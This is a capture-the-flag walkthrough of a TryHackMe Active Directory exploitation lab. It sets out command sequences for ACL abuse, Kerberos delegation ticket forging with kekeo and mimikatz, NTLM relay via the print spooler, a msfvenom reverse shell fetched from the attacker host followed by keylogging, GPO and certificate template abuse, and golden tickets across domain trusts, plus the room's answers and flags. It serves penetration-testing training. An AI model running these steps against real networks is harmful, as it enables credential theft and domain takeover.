Skip to content

ExploitingAD.md

Latest commit

 

History

History
544 lines (354 loc) · 19.2 KB

ExploitingAD.md

File metadata and controls

544 lines (354 loc) · 19.2 KB

Exploiting Active Directory - Medium

  1. Exploiting Permission Delegation
  2. Exploiting Kerberos Delegation
  3. Exploiting Automated Relays
  4. Exploiting AD Users
  5. Exploiting GPOs
  6. Exploiting Certificates
  7. Exploiting Domain Trusts

Exploiting Permission Delegation

#download given .zip file (output of running SharpHound.exe)

#start neo4j
sudo neo4j console

#run bloodhound
cd /opt/BloodHound/BloodHound-linux-x64

./BloodHound --no-sandbox
#login using neo4j:bloodhound

#drop zip file in bloodhound
#check for privesc

#login via ssh using given creds
ssh za.tryhackme.loc\\ruth.dale@thmwrk1.za.tryhackme.loc

powershell -ep bypass
#launch powershell

  • AD can delegate permissions & privileges through a feature named Permission Delegation.

  • Permission Delegation exploits are referred to as ACL-based attacks, as AD allows admins to configure ACEs (Access Control Entries) that populates DACLs (Discretionary Access Control Lists).

  • Many ACEs can be misconfigured, and the exploits vary for each ACE.

  • To exploit these ACEs, we need to interact with AD to make requests, for which tools such as AD-RSAT cmdlets and PowerSploit can be used.

  • With the given .zip file as a result of executing SharpHound.exe, we can open it in BloodHound.

  • Now, we have been given SSH creds for user in "Domain Users" group, which can RDP into THMWRK1; this will provide us with only low-priv access.

  • As this is a tiered domain, we need to first compromise "Tier 2 Admins"; in BloodHound, we can check for privesc from "Domain Users" group to "Tier 2 Admins" group using the pathfinding feature.

  • This shows that "Domain Users" can GenericWrite to "IT Support", which can ForceChangePassword to "Tier 2 Admins" group members; this can be abused, and we can check the 'Abuse Info' section in BloodHound for Powersploit related commands:

#in powershell session

Add-ADGroupMember "IT Support" -Members "ruth.dale"
#add our AD account to IT Support group
#using Add-ADGroupMember cmdlet from AD-RSAT toolset

Get-ADGroupMember -Identity "IT Support"
#verify

Get-ADGroupMember -Identity "Tier 2 Admins"
#check members of Tier 2 Admins group
#select username of random account

$Password = ConvertTo-SecureString "Password123" -AsPlainText -Force

Set-ADAccountPassword -Identity "t2_ross.bird" -Reset -NewPassword $Password

#now we can login as this tier 2 admin
#and get flag from Administrator's Desktop
ssh za.tryhackme.loc\\t2_ross.bird@thmwrk1.za.tryhackme.loc
1. Which ACE would allow you to update any non-protected parameter of a target object? - GenericWrite

2. What is the value of the flag stored on the Desktop of the Administrator user on THMWRK1 (flag1.txt)? - THM{Permission.Delegation.FTW!}

Exploiting Kerberos Delegation

  • Kerberos Delegation is used to enable apps to access resources hosted on a different server.

  • Types of Kerberos Delegation:

    • Unconstrained - originally implemented; least secure method; provides no limits to AD delegation.

    • Constrained - restricts what services an account can be delegated to.

    • Resource-based constrained - provides additional restrictions on Kerberos Delegation for security; the service specifies which objects can delegate to it.

  • Constrained Delegation exploitation:

#in privileged ssh session
whoami /groups
#part of Tier 2 Admins

powershell -ep bypass
#launch powershell session

Import-Module C:\Tools\PowerView.ps1

#enumerate available delegations
Get-NetUser -TrustedToAuth

#output shows 'svcIIS' account has
#'msds-allowedtodelegateto' set for WSMAN and HTTP

#also it is given that there is service
#on THMWRK1 running as svcIIS user

#we can use Mimikatz to dump secrets
C:\Tools\mimikatz_trunk\x64\mimikatz.exe 

#in mimikatz, impersonate system user
token::elevate

#dump secrets from registry hive
lsadump::secrets
#gives password associated with svcIIS

#we can perform kerberos delegation attack now
#using kekeo and mimikatz

#run kekeo
C:\Tools\kekeo\x64\kekeo.exe

#generate TGT to be used to generate tickets for HTTP and WSMAN services
tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:Password1@
#gives TGT file

#forge TGS requests for account to be impersonated
#in Tier 1, to access THMSERVER1

#for http
tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc

#for wsman
tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:wsman/THMSERVER1.za.tryhackme.loc

#now we have two TGS tickets
#we can exit kekeo and use mimikatz

C:\Tools\mimikatz_trunk\x64\mimikatz.exe

privilege::debug

#import both TGS tickets
kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi

kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi

exit
#exit mimikatz

klist
#verify tickets were imported

#create and enter PSSession on THMServer1
New-PSSession -ComputerName thmserver1.za.tryhackme.loc

Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc
#enters session on THMServer1

whoami
#t1_trevor.jones

#get flag from Administrator Desktop
1. Which Kerberos Delegation type allows for delegation of all services? - Unconstrained Delegation

2. Which Kerberos Delegation type allows the service to specify who is allowed to delegate to it? - Resource-based Constrained Delegation

3. Which Constrained Delegation service allows access to the file system of the system via delegation? - CIFS

4. What is the value of the flag stored in the Desktop directory of the Administrator user on THMSERVER1 (flag2.txt)? - THM{Constrained.Delegation.Can.Be.Very.Bad}

Exploiting Automated Relays

  • All Windows hosts have machine accounts; different DCs (domain controllers) use their machine accounts to synchronise AD updates & changes.

  • There are exceptional cases in AD, where one machine has admin rights over another machine; we need to identify these cases using BloodHound.

  • Using the following custom query, we can find instances where a computer has "AdminTo" relationship over another computer:

    MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p

  • This shows that THMSERVER2 machine account is "MemberOf" Server Management group, which is "AdminTo" THMSERVER1 machine account.

  • This is related to printer bugs in MS-RPRN protocol (PrintSystem Remote Protocol); and to exploit this, apart from machine account admin privileges, we need to meet these conditions:

    • A valid set of AD account creds
    • Network connectivity to target SMB service
    • Target host must be running PrintSpooler service
    • Hosts must not have SMB signing enforced
#log into ssh on THMWRK1
ssh za.tryhackme.loc\\paula.bailey@thmwrk1.za.tryhackme.loc

powershell -ep bypass

#check if printspooler service is running
GWMI Win32_Printer -Computer thmserver2.za.tryhackme.loc

#alternate query
Get-PrinterPort -ComputerName thmserver2.za.tryhackme.loc

#in attacker machine
#check THMSERVER1 and THMSERVER2 do not have SMB signing enforced

nmap --script=smb2-security-mode -p445 thmserver1.za.tryhackme.loc

#exploiting authentication relays
#using SpoolSample

#in attacker machine, setup ntlm relay
#using THMSERVER1 IP
ntlmrelayx.py -smb2support -t smb://10.200.60.201 -debug

#in powershell session

exit
#exit powershell
#we are in ssh now

cd C:\Tools

#execute exploit using attacker IP
SpoolSample.exe THMSERVER2.za.tryhackme.loc "10.50.57.82"

#ntlmrelay dumps hashes

#use ServerAdmin hash to log into THMSERVER1
evil-winrm -u ServerAdmin -H <serveradmin-hash> -i 10.200.60.201
#get flag from Administrator.ZA Desktop
1. How often (in days) are the passwords of Windows machine accounts rotated by default? - 30

2. What should not be enforced if we want to relay an SMB authentication attempt? - smb signing

3. What is the value of the flag stored in the Desktop directory of the Administrator.ZA user on THMSERVER1 (flag3.txt)? - THM{Printing.Some.Shellz}

Exploiting AD Users

  • Users are the weakest link the security chain; here we can exploit them using two elements:

    • Credential management
    • Keylogging
#in evil-winrm session as ServerAdmin
cd C:\Users

Get-ChildItem -Recurse
#print directory contents recursively
#this shows .kdbx file

cd C:\Users\trevor.local\Documents

dir
#PasswordDatabase.kdbx

download C:\Users\trevor.local\Documents\PasswordDatabase.kdbx /home/sv/PasswordDatabase.kdbx
#download to attacker machine
#this is encrypted, so we need to find another way
#in attacker machine
#create payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.50.57.82 LPORT=4444 -f psh -o shell.ps1

msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.50.57.82; set LPORT 4444; exploit"
#setup listener

#host payload using Python webserver
python3 -m http.server

#in evil-winrm session
certutil.exe -urlcache -split -f http://10.50.57.82:8000/shell.ps1
#get payload

#execute payload
.\shell.ps1

#we get meterpreter shell on attacker
ps | grep "explorer"
#shows a session on THMSERVER1 as trevor.local

migrate <PID of explorer.exe>
#migrate from system to user

getuid
#trevor.local

keyscan_start
#start keylogger

#after 2-3 minutes
keyscan_dump
#stop keylogger
#dumps password

#in attacker machine
sudo apt install keepassx
#now we can open kdbx file and use password found earlier
1. What application is used to open the kdbx credential database? - KeePass

2. What meterpreter command do we use to move from SYSTEM to user context? - migrate

3. What is the password of the credential database? - Imreallysurenoonewillguessmypassword

4. What is the value of the flag stored in the credential database? - THM{AD.Users.Can.Give.Up.Good.Secrets}

Exploiting GPOs

  • In the .kdbx file found earlier, we had another set of creds "svcServMan:Sup3rStr0ngPass!@".

  • Looking up this account in bloodhound, we can use pathfinding feature to check the path from 'svcServMan' to 'THMSERVER2'.

  • This shows that 'svcServMan' can "GenericWrite" to 'Management Server Pushes', which can "GpLink" to 'Management Servers', which "Contains" 'THMSERVER2'.

  • So, using this account, we have ownership over a GPO (Group Policy Object), which can be applied to THMSERVER2.

  • GPO is a virtual collection of policy settings; each GPO has a unique name (GUID); this is stored usually in the SYSVOL directory.

  • GPOs can be defined for AD objects; GPM (Group Policy Management) allows us to define policies on the AD structure.

  • We can attempt to exploit GPO and add an AD account to both the local Administrators and local Remote Desktop Users groups:

xfreerdp /v:thmwrk1.za.tryhackme.loc /u:louis.thornton /p:Islr3423
#rdp using given creds for THMWRK1

#inject svcServMan creds into memory
#using runas in command prompt
runas /netonly /user:za.tryhackme.loc\svcServMan cmd.exe

#opens cmd.exe
dir \\za.tryhackme.loc\sysvol
#verify it worked correctly

mmc
#open microsoft management console

  • In Microsoft Management Console, we can click File > Add/Remove Snap-in > Select 'Group Policy Management' span-in > Add > OK

  • Now, we can view the GPOs for the 'za.tryhackme.com' domain; navigate to the GPO in Servers > Management Servers > Management Server Pushes

  • Right-click on the GPO and Edit it - this brings up the Group Policy Management Editor window.

  • Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Restricted Groups > Right-Click and select Add Group > Browse > enter 'IT Support' > Check Names > Click Okay twice - we have to add Support Properties now.

  • Under Support Properties, the second filter titled 'This group is a member of' - here, we have to add the groups 'Administrators' and 'Remote Desktop Users'.

  • We can click on Apply and OK after these changes; within 15 minutes the GPO will be applied.

  • Then, as we added the given user initially to the "IT Support" group, that account will now have administrative and RDP permissions on THMSERVER2; so we can use xfreerdp and login into that machine and get the flag.

1. What object allows users to configure Windows policies? - Group Policy Object

2. What AD feature allows us to configure GPOs for the entire AD structure? - Group Policy Management

3. What is the name of the GPO that our compromised AD account owns? - Management Server Pushes

4. What is the value of the flag stored on THMSERVER2 in the Administrator's Desktop directory (flag4.txt)? - THM{Exploiting.GPOs.For.Fun.And.Profit}

Exploiting Certificates

  • AD CS (Certificate Services) is Microsoft's PKI (Public Key Infrastructure) implementation; AD can be used as CA to prove & delegate trust.

  • AD CS usually runs only on selected domain controllers. However, administrators of AD CS can create templates that can allow any user with enough permissions to request a certificate themselves.

  • Finding vulnerable certificate templates:

#in rdp session on THMSERVER2
#open powershell
certutil -Template -v > templates.txt

  • Going through the file, we need to search for a template with the following parameter combo:

    • Client Authentication
    • CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    • CTPRIVATEKEY_FLAG_EXPORTABLE_KEY
    • Certificate Permissions

  • We can see that 'Template[32]' is the vulnerable template - in this, we can see that machine account of THMSERVER2 can issue a CSR (Certificate Signing Request) for a template that allows us to specify SAN (Subject Alternative Name) and can be used for Client Authentication.

  • Exploiting certificate template:

    • In RDP access, click Start > Run > type 'mmc' to launch MMC > File > Add/Remove Snap-in > Add 'Certificates' snap-in > Select 'Computer Account' and 'Local Computer' when prompted > OK

    • Under Certificates category, right-click on Personal > All Tasks > Request New Certificate > click Next twice to select AD enrollment policy

    • The current template requires more info; click on the More Info warning > change 'Subject Name' type to 'Common Name' and provide any random value > Add > change 'Alternative Name' type to 'User Principal Name' and provide value 'Administrator@za.tryhackme.loc' > Add

    • Click Apply & OK > select certificate and Enroll - we can view our cert now

    • Right-click cert > All Tasks > Export > click Next > select 'Yes, export the private key' > click Next twice > set a password > click Next and set location with filename 'vulncert' > click Next and Finish

    • We can impersonate a user now - use certificate to request Kerberos TGT, then load Kerberos TGT

    #in RDP access to THMSERVER2
#open command prompt
cd C:\Tools

#we can use Rubeus to load Kerberos TGT
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:C:\Users\louis.thornton\Desktop\vulncert.pfx /password:password /outfile:administrator.kirbi /domain:za.tryhackme.loc /dc:10.200.60.101
#/user switch is to specify the user to be impersonated
#/dc switch is the IP of the domain controller THMCHILDDC

#this generates administrator.kirbi
#we can use mimikatz to load tgt and authenticate to THMDC

mimikatz_trunk\x64\mimikatz.exe
#in mimikatz

privilege::debug

kerberos::ptt administrator.kirbi
#load TGT

exit
#exit mimikatz

#verify if we can access THMDC file system
dir \\THMDC.za.tryhackme.loc\c$
#this successfully prints
#we can get flag now

type \\THMDC.za.tryhackme.loc\c$\Users\Administrator\Desktop\flag5.txt
1. What does the user create to ask the CA for a certificate? - Certificate Signing Request

2. What is the name of Microsoft's PKI implementation? - Active Directory Certificate Services

3. What is the value of the flag stored on THMDC in the Administrator's Desktop directory (flag5.txt)? - THM{AD.Certs.Can.Get.You.DA}

Exploiting Domain Trusts

  • We have access to Tier 0 infra till now (za.tryhackme.loc domain); we can use this to take control of the root domain (tryhackme.loc)

  • Domain Trusts are used in the AD network to gain access to other resources in the domain; trusts outline how domains in a forest communicate with each other.

  • Types of domain trusts:

    • Directional - direction of trust flows from trusting domain to trusted domain

    • Transitive - trust relationship expands beyond just two domains to include other trusted domains

  • If we have compromised a child domain, domain trusts can be exploited to compromise the parent domain as well.

  • KRBTGT is the account used for Kerberos (in Microsoft), and this is the service account for the KDC (Kerberos Distribution Center) service, which handles all Kerberos ticket requests.

  • In a Golden Ticket attack, we bypass the KDC altogether and create our own TGTs, thus becoming a TGS (Ticket Granting Server).

  • To forge TGTs, we need some info:

    • FQDN of domain
    • SID of domain
    • Username of account to be impersonated
    • KRBTGT password hash
#in compromised Tier 0 infra session
#open command prompt
cd C:\Tools

mimikatz_trunk\x64\mimikatz.exe

#in mimikatz
privilege::debug

lsadump::dcsync /user:za\krbtgt
#dumps hashes for krbtgt

  • We can also forge an Inter-Realm TGT, which are used to provide access to resources in other domains; we need to exploit bidirectional trust between child & parent domain.

  • We need to include extra account SIDs from other domains when constructing the Golden Ticket; this includes adding SID of "Enterprise Admins" group - this grants admin privileges over the entire forest.

#open powershell in compromised rdp access

#use AD-RSAT cmdlets
#get SID of child DC
Get-ADComputer -Identity "THMDC"

#get SID of EA group
Get-ADGroup -Identity "Enterprise Admins" -Server thmrootdc.tryhackme.loc
#in mimikatz session from earlier
#we can generate golden ticket now
kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:16f9af38fca3ada405386b3b57366082 /sids:S-1-5-21-3330634377-1326264276-632209373-519 /ptt
#/sid for SID of child DC
#/rc4 for NTLM hash of krbtgt
#/sids for SID of EA group

#this generates golden ticket

exit
#exit mimikatz

#verify golden ticket is working
dir \\thmdc.za.tryhackme.loc\c$
#we can access child DC filesystem

dir \\thmrootdc.tryhackme.loc\c$\
#we can access parent DC filesystem too
#we have compromised parent domain
1. What domain trust relationship is by default configured between a parent and a child domain? - Bidirectional trust

2. What is the name of the AD account used by the KDC to encrypt and sign TGTs? - krbtgt

3. What is the name of the TGT that grants access to resources outside of our current domain? - Inter-realm TGT

4. What is the value of the flag stored on THMROOTDC in the Administrator's Desktop folder (flag6.txt)? - THM{Full.EA.Compromise}